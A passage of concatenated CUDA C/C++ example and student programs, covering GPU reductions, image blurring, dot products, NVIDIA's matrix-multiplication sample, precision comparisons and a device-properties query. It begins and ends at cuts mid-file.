SA[0]; } int main(){ int n; cout << "input the vector len" << endl; cin >> n; int vectorSizeInByte = sizeof(int)*n; int* HA; HA = (int*) malloc(vectorSizeInByte); memset(HA, -1, vectorSizeInByte); cout << "initialed the host array" << endl; int* DA; gpuErrchk(cudaMalloc((void**)&DA, vectorSizeInByte)); gpuErrchk(cudaMemcpy(DA, HA, vectorSizeInByte, cudaMemcpyHostToDevice)); cout << "coped the array to device" << endl; int* Das; gpuErrchk(cudaMalloc((void**)&Das, sizeof(int))); dim3 dimgrid(1); dim3 dimblock(256); int Has = -1; // https://developer.nvidia.com/blog/using-shared-memory-cuda-cc/ need to add the third arg because this kernel use dynamic shared memory vectorSumWithinBlock<<<dimgrid, dimblock, 256*sizeof(int)>>>(DA, n, Das); cout << "sum complted" << endl; cudaMemcpy(&Has, Das, sizeof(int), cudaMemcpyDeviceToHost); cudaDeviceSynchronize(); cout << "coped the ans to host" << endl; cout << Has << endl; // https://developer.nvidia.com/blog/using-shared-memory-cuda-cc/ need to add the third arg because this kernel use dynamic shared memory vectorSumWithinBlock2<<<dimgrid, dimblock, 256*sizeof(int)>>>(DA, n, Das); cout << "sum complted" << endl; cudaMemcpy(&Has, Das, sizeof(int), cudaMemcpyDeviceToHost); cudaDeviceSynchronize(); cout << "coped the ans to host" << endl; cout << Has << endl; return 0; }
21,437
#include <cuda.h> #include <cmath> #include <cstdio> #include <cstdlib> #include <iostream> #include <chrono> #define RGB_COMPONENT_COLOR 255 #define BLUR_SIZE 5 using namespace std; typedef struct { unsigned char red, green, blue; } PPMPixel; typedef struct { int x, y; PPMPixel *data; } PPMImage; unsigned char *readPPM(const char *filename, int &x, int &y) { char buff[16]; unsigned char* imgchar; FILE *fp; int c, rgb_comp_color; //open PPM file for reading fp = fopen(filename, "rb"); if (!fp) { fprintf(stderr, "Unable to open file '%s'\n", filename); exit(1); } //read image format if (!fgets(buff, sizeof(buff), fp)) { perror(filename); exit(1); } //check the image format if (buff[0] != 'P' || buff[1] != '6') { fprintf(stderr, "Invalid image format (must be 'P6')\n"); exit(1); } //read image size information if (fscanf(fp, "%d %d", &x, &y) != 2) { fprintf(stderr, "Invalid image size (error loading '%s')\n", filename); exit(1); } //read rgb component if (fscanf(fp, "%d", &rgb_comp_color) != 1) { fprintf(stderr, "Invalid rgb component (error loading '%s')\n", filename); exit(1); } //check rgb component depth if (rgb_comp_color != RGB_COMPONENT_COLOR) { fprintf(stderr, "'%s' does not have 8-bits components\n", filename); exit(1); } while (fgetc(fp) != '\n'); //memory allocation for pixel data imgchar = (unsigned char*)malloc(3 * x*y * sizeof(char)); //read pixel data from file fread(imgchar, 3 * x, y, fp); fclose(fp); return imgchar; } void writePPM(unsigned char * img, int x, int y) { FILE *fp; //open file for output fp = fopen("C:\\UCSP\\2019-I\\AP\\Practice\\blur\\blur\\img_blur.ppm", "wb"); if (!fp) { fprintf(stderr, "Unable to open file '%s'\n", "out"); exit(1); } //write the header file //image format fprintf(fp, "P6\n"); //image size fprintf(fp, "%d %d\n", x, y); // rgb component depth fprintf(fp, "%d\n", RGB_COMPONENT_COLOR); // pixel data fwrite(img, 3 * x, y, fp); fclose(fp); } unsigned char* readBMP(char* file_name, int &width, int &height) { FILE* img = fopen(file_name, "rb"); unsigned char header[54]; fread(header, sizeof(unsigned char), 54, img); width = *(int*)&header[18]; height = *(int*)&header[22]; int size = width * height * 3; unsigned char* r_img = (unsigned char*)malloc(size * sizeof(unsigned char)); fread(r_img, sizeof(unsigned char), size, img); fclose(img); return r_img; } void writeBMP(unsigned char* img, int width, int height) { FILE* f_img; int f_size = 54 + 3 * width* height; unsigned char file_header[14] = { 'B','M', 0,0,0,0, 0,0, 0,0, 54,0,0,0 }; unsigned char info_header[40] = { 40,0,0,0, 0,0,0,0, 0,0,0,0, 1,0, 24,0 }; unsigned char pad[3] = { 0,0,0 }; file_header[2] = (unsigned char)(f_size); file_header[3] = (unsigned char)(f_size >> 8); file_header[4] = (unsigned char)(f_size >> 16); file_header[5] = (unsigned char)(f_size >> 24); info_header[4] = (unsigned char)(width); info_header[5] = (unsigned char)(width >> 8); info_header[6] = (unsigned char)(width >> 16); info_header[7] = (unsigned char)(width >> 24); info_header[8] = (unsigned char)(height); info_header[9] = (unsigned char)(height >> 8); info_header[10] = (unsigned char)(height >> 16); info_header[11] = (unsigned char)(height >> 24); f_img = fopen("C:\\UCSP\\2019-I\\AP\\Practice\\blur\\blur\\img_blur.bmp", "wb"); fwrite(file_header, 1, 14, f_img); fwrite(info_header, 1, 40, f_img); for (int i = height - 1; i >= 0; i--) { fwrite(img + (width * (height - i - 1) * 3), 3, width, f_img); fwrite(pad, 1, (4 - (width * 3) % 4) % 4, f_img); } free(img); fclose(f_img); } // Blur GPU __global__ void blurKernel(unsigned char* out, unsigned char* in, int w, int h) { int Col = threadIdx.x + blockIdx.x * blockDim.x; int Row = threadIdx.y + blockIdx.y * blockDim.y; int Offset = Row * w + Col; if ((Col < w) && (Row < h)) { int pixValR = 0; int pixValG = 0; int pixValB = 0; int pixels = 0; // Get the average of the surrounding BLUR_SIZE x BLUR_SIZE box for (int blurRow = -BLUR_SIZE; blurRow < BLUR_SIZE; blurRow++) { for (int blurCol = -BLUR_SIZE; blurCol < BLUR_SIZE; blurCol++) { int curRow = Row + blurRow; int curCol = Col + blurCol; // Verify we have a valid image pixel if ((curRow > -1) && (curRow < h) && (curCol > -1) && (curCol < w)) { int curOffset = curRow * w + curCol; pixValR += in[curOffset * 3]; pixValG += in[curOffset * 3 + 1]; pixValB += in[curOffset * 3 + 2]; pixels++; // Keep track of number of pixels in the avg } } } // Write our new pixel value out out[Offset * 3] = (unsigned char)(pixValR / pixels); out[Offset * 3 + 1] = (unsigned char)(pixValG / pixels); out[Offset * 3 + 2] = (unsigned char)(pixValB / pixels); } } int main() { unsigned char* h_img_in; unsigned char* h_img_out; unsigned char* d_img_in; unsigned char* d_img_out; int width = 0; int height = 0; char* img_name = "D:\\Documentos\\Semestre 2020-2\\Computación Paralela y Distribuida\\Tareas\\CUDA\\AP-master\\CUDA\\Blur"; //char* img_name = "C:\\UCSP\\2019-I\\AP\\Practice\\blur\\blur\\lenna.ppm"; h_img_in = readBMP(img_name, width, height); //h_img_in = readPPM(img_name, width, height); cout << "Ready img_in" << endl; int size_grey = (width * height * sizeof(unsigned char)) * 3; int size_rgb = (width * height * sizeof(unsigned char)) * 3; h_img_out = (unsigned char*)malloc(size_grey * sizeof(unsigned char)); cout << "Ready img_out" << endl; cudaMalloc(&d_img_in, size_rgb); cudaMemcpy(d_img_in, h_img_in, size_rgb, cudaMemcpyHostToDevice); cudaMalloc(&d_img_out, size_grey); cudaMemcpy(d_img_out, h_img_out, size_grey, cudaMemcpyHostToDevice); dim3 dimGrid(ceil(width / 32.0), ceil(height / 32.0), 1); dim3 dimBlock(32, 32, 1); chrono::time_point<chrono::system_clock> GPU_Start, GPU_End; GPU_Start = chrono::system_clock::now(); blurKernel <<< dimGrid, dimBlock >>> (d_img_out, d_img_in, width, height); GPU_End = chrono::system_clock::now(); cout << "GPU: " << chrono::duration_cast<chrono::nanoseconds>(GPU_End - GPU_Start).count() << "ns." << endl; cudaMemcpy(h_img_out, d_img_out, size_grey, cudaMemcpyDeviceToHost); writeBMP(h_img_out, width, height); //writePPM(h_img_out, width, height); cudaFree(d_img_in); cudaFree(d_img_out); free(h_img_in); free(h_img_out); return 0; }
21,438
#include <stdio.h> #include <sys/time.h> const int N_def (1 << 20); const int threadsPerBlock = 32; //const int blocksPerGrid = (N_def+threadsPerBlock-1) / threadsPerBlock; const int blocksPerGrid = 1; __global__ void cuda_dot(int N, double *a, double *b, double *c) { // __shared__ double localDot[threadsPerBlock]; /* Statically defined */ extern __shared__ double localDot[]; int ix = threadIdx.x + blockIdx.x * blockDim.x; int localIndex = threadIdx.x; double localSum = 0; while (ix < N) { localSum += a[ix] * b[ix]; /* Reduction is here */ ix += blockDim.x * gridDim.x; } /* Store sum computed by this thread */ localDot[localIndex] = localSum; /* Wait for all threads to get to this point */ __syncthreads(); /* Every block should add up sum computed on threads in the block */ int i = blockDim.x/2; while (i != 0) { if (localIndex < i) { localDot[localIndex] += localDot[localIndex + i]; } __syncthreads(); i /= 2; } /* Each block stores local dot product */ if (localIndex == 0) c[blockIdx.x] = localDot[0]; } double dot_gpu(int N, double *a, double *b, double *dev_a, double *dev_b, double *dev_partial_c) { double dot, *partial_c; partial_c = (double*) malloc( blocksPerGrid*sizeof(double) ); /* copy the arrays 'a' and 'b' to the GPU */ cudaMemcpy(dev_a, a, N*sizeof(double), cudaMemcpyHostToDevice ); cudaMemcpy(dev_b, b, N*sizeof(double), cudaMemcpyHostToDevice ); dim3 block(threadsPerBlock); /* Values defined in macros */ dim3 grid(blocksPerGrid); /* defined in macros, above */ cuda_dot<<<grid,block,threadsPerBlock*sizeof(double)>>>(N, dev_a, dev_b, dev_partial_c ); cudaDeviceSynchronize(); cudaPeekAtLastError(); /* copy the array 'c' back from the GPU to the CPU */ cudaMemcpy( partial_c, dev_partial_c, blocksPerGrid*sizeof(double), cudaMemcpyDeviceToHost ); /* Sum of block sums */ dot = 0; for (int i = 0; i < blocksPerGrid; i++) { dot += partial_c[i]; } free(partial_c); return dot; } double dot_cpu(int n, double *a, double *b) { double sum = 0; int i; for (i = 0; i < n; i++) { sum += a[i]*b[i]; } return sum; } /* Compute a dot product */ int main( void ) { double *a, *b; double *dev_a, *dev_b, *dev_partial_c; double c_gpu; int N; N = N_def; a = (double*) malloc( N*sizeof(double) ); b = (double*) malloc( N*sizeof(double) ); /* allocate the memory on the GPU */ cudaMalloc((void**) &dev_a, N*sizeof(double)); cudaMalloc((void**) &dev_b, N*sizeof(double)); cudaMalloc((void**) &dev_partial_c, blocksPerGrid*sizeof(double) ); /* Define vectors a and b */ for (int i = 0; i < N; i++) { a[i] = 1.0; b[i] = 1.0; } /* GPU */ c_gpu = dot_gpu(N,a,b,dev_a,dev_b,dev_partial_c); double s = N; /* Sum of 1s */ printf("%20s %10f\n","Dot product (GPU)", c_gpu); printf("%20s %10f\n","True dot product", s); /* free memory on the gpu side */ cudaFree(dev_a); cudaFree(dev_b); cudaFree(dev_partial_c); free(a); free(b); }
21,439
/* Copyright (c) 1993-2015, NVIDIA CORPORATION. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * Neither the name of NVIDIA CORPORATION nor the names of its * contributors may be used to endorse or promote products derived * from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY * OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /** * Matrix multiplication: C = A * B. * Host code. * * This sample implements matrix multiplication as described in Chapter 3 * of the programming guide. * It has been written for clarity of exposition to illustrate various CUDA * programming principles, not with the goal of providing the most * performant generic kernel for matrix multiplication. * * See also: * V. Volkov and J. Demmel, "Benchmarking GPUs to tune dense linear algebra," * in Proc. 2008 ACM/IEEE Conf. on Superconducting (SC '08), * Piscataway, NJ: IEEE Press, 2008, pp. Art. 31:1-11. */ // System includes #include <stdio.h> #include <assert.h> // CUDA runtime #include <cuda_runtime.h> // Helper functions and utilities to work with CUDA //#include <helper_functions.h> /** * Matrix multiplication (CUDA Kernel) on the device: C = A * B * wA is A's width and wB is B's width */ template <int BLOCK_SIZE> __global__ void matrixMulCUDA(float *C, float *A, float *B, int wA, int wB) { // Block index int bx = blockIdx.x; int by = blockIdx.y; // Thread index int tx = threadIdx.x; int ty = threadIdx.y; // Index of the first sub-matrix of A processed by the block int aBegin = wA * BLOCK_SIZE * by; // Index of the last sub-matrix of A processed by the block int aEnd = aBegin + wA - 1; // Step size used to iterate through the sub-matrices of A int aStep = BLOCK_SIZE; // Index of the first sub-matrix of B processed by the block int bBegin = BLOCK_SIZE * bx; // Step size used to iterate through the sub-matrices of B int bStep = BLOCK_SIZE * wB; // Csub is used to store the element of the block sub-matrix // that is computed by the thread float Csub = 0; // Loop over all the sub-matrices of A and B // required to compute the block sub-matrix for (int a = aBegin, b = bBegin; a <= aEnd; a += aStep, b += bStep) { // Declaration of the shared memory array As used to // store the sub-matrix of A __shared__ float As[BLOCK_SIZE][BLOCK_SIZE]; // Declaration of the shared memory array Bs used to // store the sub-matrix of B __shared__ float Bs[BLOCK_SIZE][BLOCK_SIZE]; // Load the matrices from device memory // to shared memory; each thread loads // one element of each matrix As[ty][tx] = A[a + wA * ty + tx]; Bs[ty][tx] = B[b + wB * ty + tx]; // Synchronize to make sure the matrices are loaded __syncthreads(); // Multiply the two matrices together; // each thread computes one element // of the block sub-matrix #pragma unroll for (int k = 0; k < BLOCK_SIZE; ++k) { Csub += As[ty][k] * Bs[k][tx]; } // Synchronize to make sure that the preceding // computation is done before loading two new // sub-matrices of A and B in the next iteration __syncthreads(); } // Write the block sub-matrix to device memory; // each thread writes one element int c = wB * BLOCK_SIZE * by + BLOCK_SIZE * bx; C[c + wB * ty + tx] = Csub; } void constantInit(float *data, int size, float val) { for (int i = 0; i < size; ++i) { data[i] = val; } } /** * Run a simple test of matrix multiplication using CUDA */ int matrixMultiply(dim3 &dimsA, dim3 &dimsB) { int block_size = 32; // Allocate host memory for matrices A and B unsigned int size_A = dimsA.x * dimsA.y; unsigned int mem_size_A = sizeof(float) * size_A; float *h_A = (float *)malloc(mem_size_A); unsigned int size_B = dimsB.x * dimsB.y; unsigned int mem_size_B = sizeof(float) * size_B; float *h_B = (float *)malloc(mem_size_B); // Initialize host memory const float valB = 0.001f; constantInit(h_A, size_A, 1.0f); constantInit(h_B, size_B, valB); // Allocate device memory float *d_A, *d_B, *d_C; // Allocate host matrix C dim3 dimsC(dimsB.x, dimsA.y, 1); unsigned int mem_size_C = dimsC.x * dimsC.y * sizeof(float); float *h_C = (float *) malloc(mem_size_C); if (h_C == NULL) { fprintf(stderr, "Failed to allocate host matrix C!\n"); exit(EXIT_FAILURE); } cudaError_t error; error = cudaMalloc((void **) &d_A, mem_size_A); if (error != cudaSuccess) { printf("cudaMalloc d_A returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } error = cudaMalloc((void **) &d_B, mem_size_B); if (error != cudaSuccess) { printf("cudaMalloc d_B returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } error = cudaMalloc((void **) &d_C, mem_size_C); if (error != cudaSuccess) { printf("cudaMalloc d_C returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } // copy host memory to device error = cudaMemcpy(d_A, h_A, mem_size_A, cudaMemcpyHostToDevice); if (error != cudaSuccess) { printf("cudaMemcpy (d_A,h_A) returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } error = cudaMemcpy(d_B, h_B, mem_size_B, cudaMemcpyHostToDevice); if (error != cudaSuccess) { printf("cudaMemcpy (d_B,h_B) returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } // Setup execution parameters dim3 threads(block_size, block_size); dim3 grid(dimsB.x / threads.x, dimsA.y / threads.y); // Create and start timer printf("\tRunning Matrix Multiplication CUDA Kernel...\n"); // Performs warmup operation using matrixMul CUDA kernel if (block_size == 16) { matrixMulCUDA<16><<< grid, threads >>>(d_C, d_A, d_B, dimsA.x, dimsB.x); } else { matrixMulCUDA<32><<< grid, threads >>>(d_C, d_A, d_B, dimsA.x, dimsB.x); } cudaDeviceSynchronize(); // Allocate CUDA events that we'll use for timing cudaEvent_t start; error = cudaEventCreate(&start); if (error != cudaSuccess) { fprintf(stderr, "Failed to create start event (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } cudaEvent_t stop; error = cudaEventCreate(&stop); if (error != cudaSuccess) { fprintf(stderr, "Failed to create stop event (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } // Record the start event error = cudaEventRecord(start, NULL); if (error != cudaSuccess) { fprintf(stderr, "Failed to record start event (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } // Execute the kernel int nIter = 300; for (int j = 0; j < nIter; j++) { if (block_size == 16) { matrixMulCUDA<16><<< grid, threads >>>(d_C, d_A, d_B, dimsA.x, dimsB.x); } else { matrixMulCUDA<32><<< grid, threads >>>(d_C, d_A, d_B, dimsA.x, dimsB.x); } } // Record the stop event error = cudaEventRecord(stop, NULL); if (error != cudaSuccess) { fprintf(stderr, "Failed to record stop event (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } // Wait for the stop event to complete error = cudaEventSynchronize(stop); if (error != cudaSuccess) { fprintf(stderr, "Failed to synchronize on the stop event (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } float msecTotal = 0.0f; error = cudaEventElapsedTime(&msecTotal, start, stop); if (error != cudaSuccess) { fprintf(stderr, "Failed to get time elapsed between events (error code %s)!\n", cudaGetErrorString(error)); exit(EXIT_FAILURE); } // Compute and print the performance float msecPerMatrixMul = msecTotal / nIter; double flopsPerMatrixMul = 2.0 * (double)dimsA.x * (double)dimsA.y * (double)dimsB.x; double gigaFlops = (flopsPerMatrixMul * 1.0e-9f) / (msecPerMatrixMul / 1000.0f); printf( "\tPerformance= %.2f GFlop/s, Time= %.3f msec, Size= %.0f Ops\n", gigaFlops, msecPerMatrixMul, flopsPerMatrixMul); // Copy result from device to host error = cudaMemcpy(h_C, d_C, mem_size_C, cudaMemcpyDeviceToHost); if (error != cudaSuccess) { printf("cudaMemcpy (h_C,d_C) returned error code %d, line(%d)\n", error, __LINE__); exit(EXIT_FAILURE); } printf("\tChecking computed result for correctness: "); bool correct = true; for (int i = 0; i < (int)(dimsC.x * dimsC.y); i++) { if (fabs(h_C[i] - (dimsA.x * valB)) > 1e-5) { printf("Error! Matrix[%05d]=%.8f, ref=%.8f error term is > 1e-5\n", i, h_C[i], dimsA.x*valB); correct = false; } } printf("%s\n", correct ? "OK" : "FAIL"); // Clean up memory free(h_A); free(h_B); free(h_C); cudaFree(d_A); cudaFree(d_B); cudaFree(d_C); printf("\n\tNote: For peak performance, please refer to the matrixMulCUBLAS example.\n"); if (correct) { return EXIT_SUCCESS; } else { return EXIT_FAILURE; } }
21,440
#include "includes.h" __global__ void kSoftMaxCrossEntropyRowMajor(float* mat, float* labels, float* target, unsigned int width, unsigned int height, float tiny) { const unsigned int idx = blockIdx.x * blockDim.x + threadIdx.x; const unsigned int numThreads = blockDim.x * gridDim.x; for (unsigned int i = idx; i < height; i += numThreads) { target[i] = -__logf(mat[height * (int)labels[i] + i] + tiny); } }
21,441
// Rishabh Agarwal - 18JE0676 #include <bits/stdc++.h> #include <cuda.h> using namespace std; // kernel functions // compare single point and double point __global__ void CompareKernel(float *da, double *db) { int tid = blockIdx.x * blockDim.x + threadIdx.x; if (tid == 0) { *da = 20.234; *db = 20.234; } } // single precision operations __global__ void SinglePrecisionOperationsKernel(float *fres_add, float *fres_sub, float *fres_mul, float *fres_div) { float f1 = 45.238; float f2 = 26.547; *fres_add = f1 + f2; *fres_sub = f1 - f2; *fres_mul = f1 * f2; *fres_div = f1 / f2; } // double precision operations __global__ void DoublePrecisionOperationsKernel(double *dres_add, double *dres_sub, double *dres_mul, double *dres_div) { double d1 = 74.112; double d2 = 55.656; *dres_add = d1 + d2; *dres_sub = d1 - d2; *dres_mul = d1 * d2; *dres_div = d1 / d2; } // main() int main() { float host_f = 20.234, device_f; double host_d = 20.234, device_d; float *da; double *db; cudaMalloc(&da, sizeof(float)); cudaMalloc(&db, sizeof(double)); CompareKernel<<<1, 32>>>(da, db); cudaMemcpy(&device_f, da, sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(&device_d, db, sizeof(double), cudaMemcpyDeviceToHost); cudaFree(da); cudaFree(db); cout << "Single point float precision number in host: " << host_f << "\n"; cout << "Single point float precision number in device: " << device_f << "\n"; cout << ((host_f == device_f) ? "Equal\n" : "Unequal\n"); cout << "Double point float precision number in host: " << host_d << "\n"; cout << "Double point float precision number in device: " << device_d << "\n"; cout << ((host_d == device_d) ? "Equal\n" : "Unequal\n"); // host and device storing variables float f1 = 45.238, f2 = 26.547; float device_f_add, device_f_sub, device_f_mul, device_f_div; double d1 = 74.112, d2 = 55.656; double device_d_add, device_d_sub, device_d_mul, device_d_div; // pointers to send in kernel float *fres_add, *fres_sub, *fres_mul, *fres_div; double *dres_add, *dres_sub, *dres_mul, *dres_div; // allocation memories cudaMalloc(&fres_add, sizeof(float)); cudaMalloc(&fres_sub, sizeof(float)); cudaMalloc(&fres_mul, sizeof(float)); cudaMalloc(&fres_div, sizeof(float)); cudaMalloc(&dres_add, sizeof(double)); cudaMalloc(&dres_sub, sizeof(double)); cudaMalloc(&dres_mul, sizeof(double)); cudaMalloc(&dres_div, sizeof(double)); // calling kernel SinglePrecisionOperationsKernel<<<1, 32>>>( fres_add, fres_sub, fres_mul, fres_div ); DoublePrecisionOperationsKernel<<<1, 32>>>( dres_add, dres_sub, dres_mul, dres_div ); // copying back to host cudaMemcpy(&device_f_add, fres_add, sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(&device_f_sub, fres_sub, sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(&device_f_mul, fres_mul, sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(&device_f_div, fres_div, sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(&device_d_add, dres_add, sizeof(double), cudaMemcpyDeviceToHost); cudaMemcpy(&device_d_sub, dres_sub, sizeof(double), cudaMemcpyDeviceToHost); cudaMemcpy(&device_d_mul, dres_mul, sizeof(double), cudaMemcpyDeviceToHost); cudaMemcpy(&device_d_div, dres_div, sizeof(double), cudaMemcpyDeviceToHost); // freeing memory cudaFree(fres_add); cudaFree(fres_sub); cudaFree(fres_mul); cudaFree(fres_div); cudaFree(dres_add); cudaFree(dres_sub); cudaFree(dres_mul); cudaFree(dres_div); cout << "\nNow performing single point precision operations:\n\n"; cout << "Single point precision addition in host: " << f1+f2 << "\n"; cout << "Single point precision addition in device: " << device_f_add << "\n"; if(device_f_add == f1 + f2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Single point precision subtraction in host: " << f1-f2 << "\n"; cout << "Single point precision subtraction in device: " << device_f_sub << "\n"; if(device_f_sub == f1 - f2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Single point precision multiplication in host: " << f1*f2 << "\n"; cout << "Single point precision multiplication in device: " << device_f_mul << "\n"; if(device_f_mul == f1 * f2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Single point precision division in host: " << f1/f2 << "\n"; cout << "Single point precision division in device: " << device_f_div << "\n"; if(device_f_div == f1 / f2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Now performing double point precision operations:\n\n"; cout << "Double point precision addition in host: " << d1+d2 << "\n"; cout << "Double point precision addition in device: " << device_d_add << "\n"; if(device_d_add == d1 + d2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Double point precision subtraction in host: " << d1-d2 << "\n"; cout << "Double point precision subtraction in device: " << device_d_sub << "\n"; if(device_d_sub == d1 - d2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Double point precision multiplication in host: " << d1*d2 << "\n"; cout << "Double point precision multiplication in device: " << device_d_mul << "\n"; if(device_d_mul == d1 * d2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } cout << "Double point precision division in host: " << d1/d2 << "\n"; cout << "Double point precision division in device: " << device_d_div << "\n"; if(device_d_div == d1 / d2) { cout << "Equal\n\n"; } else { cout << "Unequal\n\n"; } return 0; }
21,442
#include <stdio.h> #include <stdlib.h> __global__ void add(int *a, int *b, int *c) { c[blockIdx.x] = a[blockIdx.x] + b[blockIdx.x]; printf("hello "); } #define N 512 int main(void) { int *a, *b, *c; int *d_a, *d_b, *d_c; int size = N*sizeof(int); // host copies of a, b, c // device copies of a, b, c // Allocate space for device copies of a, c, b cudaMalloc((void **)&d_a, size); cudaMalloc((void **)&d_b, size); cudaMalloc((void **)&d_c, size); // Setup input values a = (int *) malloc(size); b = (int *) malloc(size); for(int i=0; i<N; i++){ a[i]=rand()%10; b[i]=rand()%10; } c = (int *) malloc(size); // Copy inputs to device cudaMemcpy(d_a, a, size, cudaMemcpyHostToDevice); cudaMemcpy(d_b, b, size, cudaMemcpyHostToDevice); // Launch add() kernel on GPU add<<<N,1>>>(d_a, d_b, d_c); // Copy result back to host cudaMemcpy(c, d_c, size, cudaMemcpyDeviceToHost); for(int i=0; i<10; i++){ printf("Executed: %d + %d = %d\n", a[i], b[i], c[i]); } // Cleanup free(a); free(b); free(c); cudaFree(d_a); cudaFree(d_b); cudaFree(d_c); return 0; }
21,443
#include "includes.h" __global__ void addGridThreads(int n, float *x, float *y) { // Let the kernel calculate which part of the input signal to play with, but // now also include the grid information int index = blockIdx.x * blockDim.x + threadIdx.x; int stride = blockDim.x * gridDim.x; for (int i = index; i < n; i += stride) y[i] = x[i] + y[i]; }
21,444
/* autor fredy m uaem desonses@gmail.com para mas comentarios */ #include <device_functions.h> #include <stdio.h> #include <stdlib.h> #include <cuda_runtime.h> #include <device_launch_parameters.h> #define N 3 /* multiplicacion de matrices con memoria constante */ // definicion de memoria constante CUDA __constant__ float dev_A[N][N]; __constant__ float dev_B[N][N]; //GLOBAL: func desde el host y ejecutada en el kernel(DEVICE) __global__ void multiplicacion(float *dev_C) { int suma = 0; int columna = threadIdx.x; int fila = threadIdx.y; int pos = columna + N * fila; if (columna < N && fila < N) { for (int k = 0; k < N; k++) { dev_C[pos] += dev_A[fila][k] * dev_B[k][columna]; } } } int main(int argc, char** argv) { float *hst_A, *hst_B, *hst_C; float *dev_C; int size = N * N * sizeof(float); //reserva de memoria en el host hst_A = (float*)malloc(size); hst_B = (float*)malloc(size); hst_C = (float*)malloc(size); //reserva de memoria en el device cudaMalloc((void**)&dev_C, size); //llenar la matriz for (int i = 0; i < N*N; i++) { hst_A[i] = float(i) + 1; hst_B[i] = float(i); } //copiar los datos hacia el device desde memoria constante cudaError_t error = cudaMemcpyToSymbol(dev_A, hst_A, size); if (error != cudaSuccess) { printf("Error Memoria constante dev_A to hst_A\n"); } error = cudaMemcpyToSymbol(dev_B, hst_B, size); if (error != cudaSuccess) { printf("Error Memoria constante dev_B to hst_B\n"); } //dimensiones del kernel a lanzar dim3 bloques(1); dim3 hilos(N, N); //lanzamiento del kernel multiplicacion <<<bloques, hilos >>> (dev_C); //recoger los datos cudaMemcpy(hst_C, dev_C, size, cudaMemcpyDeviceToHost); //impresion de los datos printf("\nMatriz A:\n"); for (int i = 0; i < N; i++) { for (int j = 0; j < N; j++) { printf("%.2f\t", hst_A[j + i * N]); } printf("\n"); } printf("\nMatriz B:\n"); for (int i = 0; i < N; i++) { for (int j = 0; j < N; j++) { printf("%.2f\t", hst_B[j + i * N]); } printf("\n"); } printf("\n"); printf("multiplicacion de matrices A y B:\n"); for (int i = 0; i < N; i++) { for (int j = 0; j < N; j++) { printf("%.2f\t", hst_C[j + i * N]); } printf("\n"); } printf("\n pulsa INTRO para salir:\n"); fflush(stdin); char tecla = getchar(); return 0; }
21,445
#include <stdio.h> int main( void ) { cudaDeviceProp prop; int count; cudaGetDeviceCount(&count); for (int i=0; i< count; i++) { cudaGetDeviceProperties(&prop, i); printf( " --- General Information for device %d ---\n", i ); printf( "Device %d: %s\n", i, prop.name ); printf( "CUDA capability Major.Minor version: %d.%d\n", prop.major, prop.minor ); printf( "Total global mem: %.0f MBytes (%ld bytes)\n", prop.totalGlobalMem/1048576.0f, prop.totalGlobalMem ); printf( "GPU Max Clock rate: %.0f MHz (%0.2f GHz)\n", prop.clockRate*1e-3f,prop.clockRate*1e-6f ); printf("Memory Clock rate: %.0f Mhz\n", prop.memoryClockRate * 1e-3f); printf("Memory Bus Width: %d-bit\n", prop.memoryBusWidth); printf( "Total constant memory: %ld bytes\n", prop.totalConstMem ); printf( "Shared memory per block: %ld bytes\n", prop.sharedMemPerBlock ); printf( "Registers per block: %d\n", prop.regsPerBlock ); printf( "Warp size: %d\n", prop.warpSize ); printf( "Max memory pitch: %ld bytes\n", prop.memPitch ); printf( "Texture Alignment: %ld bytes\n", prop.textureAlignment ); printf( "Multiprocessor count: %d\n", prop.multiProcessorCount ); printf( "Max threads per block: %d\n", prop.maxThreadsPerBlock ); printf( "Max thread block dimensions (x,y,z): (%d, %d, %d)\n", prop.maxThreadsDim[0], prop.maxThreadsDim[1], prop.maxThreadsDim[2] ); printf( "Max grid dimensions (x,y,z): (%d, %d, %d)\n", prop.maxGridSize[0], prop.maxGridSize[1], prop.maxGridSize[2] ); printf( "Concurrent copy 